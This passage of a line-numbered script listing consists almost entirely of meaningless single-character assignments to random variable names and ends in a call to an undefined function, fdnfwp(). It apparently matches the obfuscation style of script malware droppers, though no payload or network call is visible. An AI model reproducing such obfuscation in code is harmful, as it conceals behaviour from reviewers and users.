789 | lszohmwr = "l"; | |
790 | lszohmwr = "K"; | |
791 | lszohmwr = "x"; | |
792 | qbvmxjbj = "V"; | |
793 | qbvmxjbj = "m"; | |
794 | qbvmxjbj = "R"; | |
795 | qbvmxjbj = "k"; | |
796 | qbvmxjbj = "x"; | |
797 | qbvmxjbj = "Q"; | |
798 | qbvmxjbj = "V"; | |
799 | qbvmxjbj = "D"; | |
800 | qbvmxjbj = "j"; | |
801 | qbvmxjbj = "f"; | |
802 | obwhac = "N"; | |
803 | cpaotezor = "x"; | |
804 | cpaotezor = "r"; | |
805 | cpaotezor = "F"; | |
806 | cpaotezor = "O"; | |
807 | cpaotezor = "G"; | |
808 | cpaotezor = "w"; | |
809 | cpaotezor = "R"; | |
810 | fnpzqgy = "b"; | |
811 | fnpzqgy = "H"; | |
812 | fnpzqgy = "x"; | |
813 | fnpzqgy = "C"; | |
814 | fnpzqgy = "N"; | |
815 | fnpzqgy = "Z"; | |
816 | fnpzqgy = "s"; | |
817 | fnpzqgy = "F"; | |
818 | fnpzqgy = "F"; | |
819 | fnpzqgy = "t"; | |
820 | fnpzqgy = "h"; | |
821 | fnpzqgy = "J"; | |
822 | fnpzqgy = "g"; | |
823 | fnpzqgy = "T"; | |
824 | fnpzqgy = "d"; | |
825 | fnpzqgy = "k"; | |
826 | fnpzqgy = "S"; | |
827 | fnpzqgy = "e"; | |
828 | fnpzqgy = "k"; | |
829 | fnpzqgy = "G"; | |
830 | fnpzqgy = "H"; | |
831 | fnpzqgy = "x"; | |
832 | fnpzqgy = "x"; | |
833 | fnpzqgy = "c"; | |
834 | fnpzqgy = "m"; | |
835 | fnpzqgy = "k"; | |
836 | fnpzqgy = "&"; | |
837 | bljtk = "m"; | |
838 | bljtk = "b"; | |
839 | bljtk = "v"; | |
840 | bljtk = "t"; | |
841 | bljtk = "V"; | |
842 | bljtk = "U"; | |
843 | bljtk = "P"; | |
844 | bljtk = "e"; | |
845 | bljtk = "F"; | |
846 | bljtk = "I"; | |
847 | bljtk = "x"; | |
848 | bljtk = "Q"; | |
849 | bljtk = "e"; | |
850 | bljtk = "y"; | |
851 | bljtk = "I"; | |
852 | bljtk = "J"; | |
853 | bljtk = "V"; | |
854 | bljtk = "N"; | |
855 | bljtk = "F"; | |
856 | bljtk = "P"; | |
857 | bljtk = "Q"; | |
858 | bljtk = "q"; | |
859 | bljtk = "q"; | |
860 | bljtk = "N"; | |
861 | bljtk = "F"; | |
862 | bljtk = "X"; | |
863 | bljtk = "V"; | |
864 | bljtk = "q"; | |
865 | bljtk = "w"; | |
866 | bljtk = "V"; | |
867 | bljtk = "f"; | |
868 | bljtk = "p"; | |
869 | vpjve = "a"; | |
870 | vpjve = "3"; | |
871 | zgqvsyrho = "T"; | |
872 | zgqvsyrho = "s"; | |
873 | zgqvsyrho = "i"; | |
874 | zgqvsyrho = "L"; | |
875 | zgqvsyrho = "y"; | |
876 | zgqvsyrho = "P"; | |
877 | zgqvsyrho = "g"; | |
878 | zgqvsyrho = "Y"; | |
879 | zgqvsyrho = "b"; | |
880 | zgqvsyrho = "L"; | |
881 | zgqvsyrho = "m"; | |
882 | xtvvvo = "i"; | |
883 | xtvvvo = "x"; | |
884 | xtvvvo = "o"; | |
885 | xtvvvo = "g"; | |
886 | xtvvvo = "f"; | |
887 | xtvvvo = "P"; | |
888 | xtvvvo = "s"; | |
889 | xtvvvo = "t"; | |
890 | xtvvvo = "h"; | |
891 | xtvvvo = "P"; | |
892 | xtvvvo = "O"; | |
893 | xtvvvo = "j"; | |
894 | xtvvvo = "s"; | |
895 | xtvvvo = "g"; | |
896 | xtvvvo = "k"; | |
897 | xtvvvo = "c"; | |
898 | xtvvvo = "M"; | |
899 | xtvvvo = "C"; | |
900 | xtvvvo = "z"; | |
901 | xtvvvo = "h"; | |
902 | xtvvvo = "B"; | |
903 | xtvvvo = "e"; | |
904 | xtvvvo = "r"; | |
905 | xtvvvo = "k"; | |
906 | xtvvvo = "z"; | |
907 | xtvvvo = "L"; | |
908 | xtvvvo = "S"; | |
909 | xtvvvo = "F"; | |
910 | xtvvvo = "z"; | |
911 | xtvvvo = "R"; | |
912 | xtvvvo = "M"; | |
913 | xtvvvo = "S"; | |
914 | xtvvvo = "O"; | |
915 | xtvvvo = "U"; | |
916 | xtvvvo = "A"; | |
917 | xtvvvo = "T"; | |
918 | xtvvvo = "r"; | |
919 | xtvvvo = "e"; | |
920 | xtvvvo = "u"; | |
921 | xtvvvo = "p"; | |
922 | xtvvvo = "w"; | |
923 | xyhjmivc = "e"; | |
924 | xyhjmivc = "E"; | |
925 | xyhjmivc = "G"; | |
926 | xyhjmivc = "z"; | |
927 | xyhjmivc = "U"; | |
928 | xyhjmivc = "e"; | |
929 | plekzlegi = "j"; | |
930 | plekzlegi = "m"; | |
931 | plekzlegi = "S"; | |
932 | plekzlegi = "n"; | |
933 | plekzlegi = "j"; | |
934 | plekzlegi = "n"; | |
935 | plekzlegi = "L"; | |
936 | plekzlegi = "g"; | |
937 | plekzlegi = "o"; | |
938 | plekzlegi = "X"; | |
939 | plekzlegi = "S"; | |
940 | plekzlegi = "T"; | |
941 | plekzlegi = "e"; | |
942 | plekzlegi = "g"; | |
943 | plekzlegi = "w"; | |
944 | plekzlegi = "Y"; | |
945 | plekzlegi = "S"; | |
946 | plekzlegi = "O"; | |
947 | plekzlegi = "K"; | |
948 | plekzlegi = "p"; | |
949 | plekzlegi = "Y"; | |
950 | plekzlegi = "G"; | |
951 | plekzlegi = "l"; | |
952 | plekzlegi = "O"; | |
953 | plekzlegi = "u"; | |
954 | plekzlegi = "t"; | |
955 | utxwucpiq = "L"; | |
956 | utxwucpiq = "X"; | |
957 | utxwucpiq = "s"; | |
958 | utxwucpiq = "N"; | |
959 | utxwucpiq = "t"; | |
960 | utxwucpiq = "V"; | |
961 | utxwucpiq = "k"; | |
962 | utxwucpiq = "A"; | |
963 | utxwucpiq = "E"; | |
964 | utxwucpiq = "g"; | |
965 | utxwucpiq = "B"; | |
966 | utxwucpiq = "s"; | |
967 | utxwucpiq = "w"; | |
968 | utxwucpiq = "C"; | |
969 | utxwucpiq = "B"; | |
970 | utxwucpiq = "g"; | |
971 | utxwucpiq = "l"; | |
972 | utxwucpiq = "T"; | |
973 | utxwucpiq = "t"; | |
974 | utxwucpiq = "B"; | |
975 | utxwucpiq = "P"; | |
976 | utxwucpiq = "r"; | |
977 | utxwucpiq = "A"; | |
978 | utxwucpiq = "Y"; | |
979 | utxwucpiq = "l"; | |
980 | utxwucpiq = "n"; | |
981 | utxwucpiq = "f"; | |
982 | utxwucpiq = "l"; | |
983 | utxwucpiq = "p"; | |
984 | utxwucpiq = "v"; | |
985 | utxwucpiq = "l"; | |
986 | utxwucpiq = "M"; | |
987 | utxwucpiq = "w"; | |
988 | utxwucpiq = "n"; | |
989 | utxwucpiq = "x"; | |
990 | utxwucpiq = "L"; | |
991 | utxwucpiq = "t"; | |
992 | utxwucpiq = "g"; | |
993 | utxwucpiq = "F"; | |
994 | utxwucpiq = "E"; | |
995 | vhmirryi = "W"; | |
996 | vhmirryi = "J"; | |
997 | vhmirryi = "o"; | |
998 | vhmirryi = "z"; | |
999 | vhmirryi = "P"; | |
1000 | vhmirryi = "H"; | |
1001 | vhmirryi = "j"; | |
1002 | vhmirryi = "m"; | |
1003 | vhmirryi = "m"; | |
1004 | vhmirryi = "H"; | |
1005 | vhmirryi = "t"; | |
1006 | vhmirryi = "S"; | |
1007 | vhmirryi = "V"; | |
1008 | vhmirryi = "b"; | |
1009 | vhmirryi = "W"; | |
1010 | vhmirryi = "r"; | |
1011 | vhmirryi = "v"; | |
1012 | vhmirryi = "d"; | |
1013 | vhmirryi = "B"; | |
1014 | vhmirryi = "B"; | |
1015 | vhmirryi = "g"; | |
1016 | yoxtfwgmn = "O"; | |
1017 | yoxtfwgmn = "B"; | |
1018 | yoxtfwgmn = "z"; | |
1019 | yoxtfwgmn = "B"; | |
1020 | yoxtfwgmn = "O"; | |
1021 | yoxtfwgmn = "i"; | |
1022 | yoxtfwgmn = "p"; | |
1023 | yoxtfwgmn = "u"; | |
1024 | yoxtfwgmn = "X"; | |
1025 | yoxtfwgmn = "O"; | |
1026 | yoxtfwgmn = "S"; | |
1027 | yoxtfwgmn = "V"; | |
1028 | yoxtfwgmn = "T"; | |
1029 | yoxtfwgmn = "C"; | |
1030 | yoxtfwgmn = "g"; | |
1031 | yoxtfwgmn = "X"; | |
1032 | yoxtfwgmn = "o"; | |
1033 | yoxtfwgmn = "M"; | |
1034 | yoxtfwgmn = "S"; | |
1035 | yoxtfwgmn = "R"; | |
1036 | yoxtfwgmn = "e"; | |
1037 | yoxtfwgmn = "C"; | |
1038 | gjhpf = "M"; | |
1039 | gjhpf = "l"; | |
1040 | gjhpf = "j"; | |
1041 | gjhpf = "h"; | |
1042 | gjhpf = "f"; | |
1043 | gjhpf = "R"; | |
1044 | gjhpf = "K"; | |
1045 | gjhpf = "A"; | |
1046 | gjhpf = "U"; | |
1047 | gjhpf = "X"; | |
1048 | gjhpf = "F"; | |
1049 | gjhpf = "S"; | |
1050 | gjhpf = "H"; | |
1051 | ubadkv = "t"; | |
1052 | ubadkv = "S"; | |
1053 | ubadkv = "Z"; | |
1054 | ubadkv = "i"; | |
1055 | ubadkv = "k"; | |
1056 | ubadkv = "p"; | |
1057 | ubadkv = "x"; | |
1058 | ubadkv = "u"; | |
1059 | ubadkv = "X"; | |
1060 | ubadkv = "P"; | |
1061 | ubadkv = "v"; | |
1062 | ubadkv = "X"; | |
1063 | ubadkv = "Y"; | |
1064 | mikkhpcp = "p"; | |
1065 | mikkhpcp = "P"; | |
1066 | mikkhpcp = "J"; | |
1067 | mikkhpcp = "V"; | |
1068 | mikkhpcp = "I"; | |
1069 | mikkhpcp = "m"; | |
1070 | mikkhpcp = "O"; | |
1071 | mikkhpcp = "0"; | |
1072 | eszhjnquf = "F"; | |
1073 | eszhjnquf = "I"; | |
1074 | eszhjnquf = "v"; | |
1075 | eszhjnquf = "k"; | |
1076 | eszhjnquf = "o"; | |
1077 | eszhjnquf = "d"; | |
1078 | eszhjnquf = "o"; | |
1079 | eszhjnquf = "V"; | |
1080 | eszhjnquf = "p"; | |
1081 | eszhjnquf = "Q"; | |
1082 | eszhjnquf = "I"; | |
1083 | eszhjnquf = "j"; | |
1084 | eszhjnquf = "h"; | |
1085 | eszhjnquf = "V"; | |
1086 | eszhjnquf = "S"; | |
1087 | eszhjnquf = "V"; | |
1088 | eszhjnquf = "g"; | |
1089 | eszhjnquf = "T"; | |
1090 | knmxli = "b"; | |
1091 | knmxli = "p"; | |
1092 | knmxli = "J"; | |
1093 | knmxli = "p"; | |
1094 | knmxli = "E"; | |
1095 | knmxli = "Q"; | |
1096 | rraqayd = "I"; | |
1097 | rraqayd = "U"; | |
1098 | rraqayd = "W"; | |
1099 | rraqayd = "U"; | |
1100 | rraqayd = "q"; | |
1101 | rraqayd = "D"; | |
1102 | rraqayd = ":"; | |
1103 | jkokiw = "S"; | |
1104 | jkokiw = "t"; | |
1105 | jkokiw = "u"; | |
1106 | jkokiw = "V"; | |
1107 | jkokiw = "m"; | |
1108 | jkokiw = "l"; | |
1109 | jkokiw = "J"; | |
1110 | jkokiw = "g"; | |
1111 | jkokiw = "U"; | |
1112 | jkokiw = "D"; | |
1113 | jkokiw = "M"; | |
1114 | jkokiw = "i"; | |
1115 | jkokiw = "Q"; | |
1116 | jkokiw = "x"; | |
1117 | jkokiw = "G"; | |
1118 | jkokiw = "u"; | |
1119 | jkokiw = "J"; | |
1120 | jkokiw = "X"; | |
1121 | jkokiw = "R"; | |
1122 | jkokiw = "p"; | |
1123 | jkokiw = "R"; | |
1124 | jkokiw = "c"; | |
1125 | jkokiw = "y"; | |
1126 | jkokiw = "I"; | |
1127 | jkokiw = "b"; | |
1128 | jkokiw = "h"; | |
1129 | jkokiw = "G"; | |
1130 | jkokiw = "o"; | |
1131 | jkokiw = "-"; | |
1132 | raidx = "Q"; | |
1133 | raidx = "f"; | |
1134 | raidx = "O"; | |
1135 | raidx = "e"; | |
1136 | raidx = "M"; | |
1137 | raidx = "o"; | |
1138 | raidx = "Q"; | |
1139 | raidx = "S"; | |
1140 | raidx = "L"; | |
1141 | raidx = "C"; | |
1142 | raidx = "b"; | |
1143 | raidx = "m"; | |
1144 | raidx = "b"; | |
1145 | raidx = "L"; | |
1146 | raidx = "E"; | |
1147 | raidx = "D"; | |
1148 | raidx = "U"; | |
1149 | raidx = "p"; | |
1150 | raidx = "n"; | |
1151 | raidx = "y"; | |
1152 | raidx = "Z"; | |
1153 | raidx = "z"; | |
1154 | raidx = "v"; | |
1155 | raidx = "p"; | |
1156 | raidx = "a"; | |
1157 | raidx = "c"; | |
1158 | raidx = "k"; | |
1159 | raidx = "s"; | |
1160 | raidx = "v"; | |
1161 | raidx = "n"; | |
1162 | raidx = "V"; | |
1163 | raidx = "C"; | |
1164 | raidx = "e"; | |
1165 | raidx = "X"; | |
1166 | raidx = "g"; | |
1167 | raidx = "i"; | |
1168 | izeryn = "n"; | |
1169 | izeryn = "f"; | |
1170 | izeryn = "O"; | |
1171 | izeryn = "l"; | |
1172 | izeryn = "p"; | |
1173 | izeryn = "j"; | |
1174 | izeryn = "8"; | |
1175 | ujdzddbiu = "n"; | |
1176 | ujdzddbiu = "H"; | |
1177 | ujdzddbiu = "s"; | |
1178 | ujdzddbiu = "o"; | |
1179 | ujdzddbiu = "m"; | |
1180 | ujdzddbiu = "b"; | |
1181 | ujdzddbiu = "L"; | |
1182 | ujdzddbiu = "w"; | |
1183 | ujdzddbiu = "2"; | |
1184 | ukhan = "o"; | |
1185 | ukhan = "u"; | |
1186 | ukhan = "X"; | |
1187 | ukhan = "O"; | |
1188 | ukhan = "A"; | |
1189 | ukhan = "R"; | |
1190 | ukhan = "U"; | |
1191 | ukhan = "Y"; | |
1192 | ukhan = "D"; | |
1193 | ukhan = "P"; | |
1194 | ukhan = "W"; | |
1195 | ukhan = "y"; | |
1196 | ukhan = "a"; | |
1197 | ukhan = "Z"; | |
1198 | ukhan = "1"; | |
1199 | rvmsbqdg = "n"; | |
1200 | rvmsbqdg = "Q"; | |
1201 | rvmsbqdg = "h"; | |
1202 | rvmsbqdg = "A"; | |
1203 | rvmsbqdg = "A"; | |
1204 | rvmsbqdg = "t"; | |
1205 | rvmsbqdg = "u"; | |
1206 | rvmsbqdg = "r"; | |
1207 | rvmsbqdg = "e"; | |
1208 | rvmsbqdg = "Y"; | |
1209 | rvmsbqdg = "o"; | |
1210 | rvmsbqdg = "m"; | |
1211 | rvmsbqdg = "r"; | |
1212 | rvmsbqdg = "t"; | |
1213 | rvmsbqdg = "D"; | |
1214 | rvmsbqdg = "V"; | |
1215 | rvmsbqdg = "u"; | |
1216 | rvmsbqdg = "u"; | |
1217 | rvmsbqdg = "N"; | |
1218 | rvmsbqdg = "J"; | |
1219 | rvmsbqdg = "Q"; | |
1220 | rvmsbqdg = "K"; | |
1221 | rvmsbqdg = "J"; | |
1222 | rvmsbqdg = "U"; | |
1223 | rvmsbqdg = "s"; | |
1224 | rvmsbqdg = "C"; | |
1225 | rvmsbqdg = "x"; | |
1226 | rvmsbqdg = "D"; | |
1227 | rvmsbqdg = "b"; | |
1228 | rvmsbqdg = "l"; | |
1229 | rvmsbqdg = "Q"; | |
1230 | rvmsbqdg = "d"; | |
1231 | rvmsbqdg = "a"; | |
1232 | rvmsbqdg = "W"; | |
1233 | rvmsbqdg = "T"; | |
1234 | rvmsbqdg = "o"; | |
1235 | rvmsbqdg = "_"; | |
1236 | pyvojpdos = "i"; | |
1237 | pyvojpdos = "O"; | |
1238 | pyvojpdos = "k"; | |
1239 | pyvojpdos = "d"; | |
1240 | pyvojpdos = "Y"; | |
1241 | pyvojpdos = "K"; | |
1242 | pyvojpdos = "p"; | |
1243 | pyvojpdos = "S"; | |
1244 | pyvojpdos = "X"; | |
1245 | pyvojpdos = "S"; | |
1246 | pyvojpdos = "z"; | |
1247 | pyvojpdos = "s"; | |
1248 | pyvojpdos = "w"; | |
1249 | pyvojpdos = "@"; | |
1250 | ledha = "p"; | |
1251 | ledha = "C"; | |
1252 | ledha = "I"; | |
1253 | ledha = "c"; | |
1254 | ledha = "n"; | |
1255 | ledha = "O"; | |
1256 | ledha = "J"; | |
1257 | ledha = "W"; | |
1258 | ledha = "n"; | |
1259 | ledha = "R"; | |
1260 | ledha = "k"; | |
1261 | ledha = "q"; | |
1262 | ledha = "h"; | |
1263 | ledha = "V"; | |
1264 | ledha = "S"; | |
1265 | ledha = "Y"; | |
1266 | ledha = "U"; | |
1267 | ledha = "X"; | |
1268 | ledha = "Z"; | |
1269 | ledha = "v"; | |
1270 | ledha = "L"; | |
1271 | ledha = "d"; | |
1272 | ledha = "l"; | |
1273 | ledha = "Z"; | |
1274 | ledha = "S"; | |
1275 | ledha = "5"; | |
1276 | njuanv = "N"; | |
1277 | njuanv = "n"; | |
1278 | njuanv = "a"; | |
1279 | njuanv = "A"; | |
1280 | njuanv = "L"; | |
1281 | njuanv = "q"; | |
1282 | njuanv = "f"; | |
1283 | njuanv = "G"; | |
1284 | njuanv = "G"; | |
1285 | njuanv = "e"; | |
1286 | njuanv = "B"; | |
1287 | njuanv = "l"; | |
1288 | njuanv = "A"; | |
1289 | njuanv = "r"; | |
1290 | njuanv = "n"; | |
1291 | njuanv = "M"; | |
1292 | njuanv = "Z"; | |
1293 | njuanv = "Q"; | |
1294 | njuanv = "z"; | |
1295 | njuanv = "K"; | |
1296 | njuanv = "j"; | |
1297 | njuanv = "k"; | |
1298 | fpors = "O"; | |
1299 | fpors = "i"; | |
1300 | fpors = "F"; | |
1301 | fpors = "E"; | |
1302 | fpors = "w"; | |
1303 | fpors = "U"; | |
1304 | fpors = "x"; | |
1305 | fpors = "Y"; | |
1306 | fpors = "z"; | |
1307 | fpors = "e"; | |
1308 | fpors = "T"; | |
1309 | fpors = "S"; | |
1310 | fpors = "z"; | |
1311 | fpors = "w"; | |
1312 | fpors = "o"; | |
1313 | fpors = "l"; | |
1314 | fpors = "G"; | |
1315 | fpors = "Z"; | |
1316 | fpors = "Z"; | |
1317 | fpors = "e"; | |
1318 | fpors = "P"; | |
1319 | fpors = "Z"; | |
1320 | fpors = "R"; | |
1321 | fpors = "A"; | |
1322 | fpors = "M"; | |
1323 | fpors = "I"; | |
1324 | fpors = "R"; | |
1325 | fpors = "r"; | |
1326 | fpors = "h"; | |
1327 | fpors = "g"; | |
1328 | fpors = "i"; | |
1329 | fpors = "U"; | |
1330 | fpors = "x"; | |
1331 | fpors = "e"; | |
1332 | fpors = "X"; | |
1333 | fpors = "J"; | |
1334 | fpors = "M"; | |
1335 | fpors = "R"; | |
1336 | fpors = "Y"; | |
1337 | fpors = "n"; | |
1338 | fpors = "d"; | |
1339 | fpors = "A"; | |
1340 | fpors = "d"; | |
1341 | ejtjqzieo = "V"; | |
1342 | ejtjqzieo = "d"; | |
1343 | ejtjqzieo = "O"; | |
1344 | ejtjqzieo = "Y"; | |
1345 | ejtjqzieo = "m"; | |
1346 | ejtjqzieo = "F"; | |
1347 | ejtjqzieo = "h"; | |
1348 | ejtjqzieo = "K"; | |
1349 | ejtjqzieo = "G"; | |
1350 | ejtjqzieo = "z"; | |
1351 | ejtjqzieo = "G"; | |
1352 | ejtjqzieo = "Q"; | |
1353 | ejtjqzieo = "b"; | |
1354 | ejtjqzieo = "E"; | |
1355 | ejtjqzieo = "m"; | |
1356 | ejtjqzieo = "f"; | |
1357 | ejtjqzieo = "p"; | |
1358 | ejtjqzieo = "n"; | |
1359 | ejtjqzieo = "D"; | |
1360 | ejtjqzieo = "c"; | |
1361 | ejtjqzieo = "B"; | |
1362 | ejtjqzieo = "m"; | |
1363 | ejtjqzieo = "G"; | |
1364 | ejtjqzieo = "l"; | |
1365 | ejtjqzieo = "G"; | |
1366 | ejtjqzieo = "y"; | |
1367 | ejtjqzieo = "w"; | |
1368 | ejtjqzieo = "n"; | |
1369 | fdnfwp ( ); |
|